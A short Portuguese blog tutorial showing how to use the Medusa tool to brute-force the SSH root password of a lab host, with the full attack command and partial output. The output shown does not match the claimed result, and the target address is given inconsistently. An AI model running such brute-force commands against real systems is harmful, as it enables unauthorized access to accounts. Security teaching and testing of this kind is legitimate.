sábado, 3 de agosto de 2013

Utilizando o Medusa

Utilizando Medusa

Uma boa ferramenta que podemos utilizar para ataques remotos obtendo
senha através de força bruta é a Medusa. A ferramenta em modo texto não
deixa nada a desejar, as opções de uso podem ser verificadas através do co-
mando medusa –h, conforme exibido a seguir:

A sintaxe de utilização é simples e para nosso teste vamos utilizar como alvo o host 192.186.32.132 rodando um serviço SSH.

#medusa -h
Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file]
-M module [OPT]

No teste anterior, utilizamos o comando medusa –h 192.168.32.132 , buscan-
do o host 192.168.32.132, -n 22 especificando a porta 22, -u root setando o
usuário root, -P /root/senhas_ssh.txt referencia o arquivo de senhas criado
que em nosso caso é senhas_ssh.txt, por fim, -M ssh habilitando o módulo
SSH. Repare que, mais uma vez, obtivemos sucesso e o medusa nos retorna
o usuário root e senha 12345678.

root@root:~# medusa -h 192.168.32.132 -n 22 -u root -P /root/senhas_ssh.txt -M ssh

Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
The default build of Libssh2 is to use OpenSSL for crypto. Several Linux distributions (e.g. Debian, Ubuntu) build it to use Libgcrypt. Unfortunately, the implementation within Libssh2 of libgcrypt appears to be broken and is not thread safe. If you run multiple concurrent Medusa SSH connections, you are likely to experience segmentation faults. Please help Libssh2 fix this issue or encourage your distro to use the default Libssh2 build options.

ACCOUNT CHECK: [ssh] Host: 192.168.32.132 (1 of 1, 0 complete) User: root (1 of 1, 0
complete) Password: jacare (1 of 14 complete)

← Postagem mais recente Postagem mais antiga → Página inicial

0 comentários:

Postar um comentário

Copyright © Hacking & Security | Powered by Xandao Design by Xandao86 | Xandao86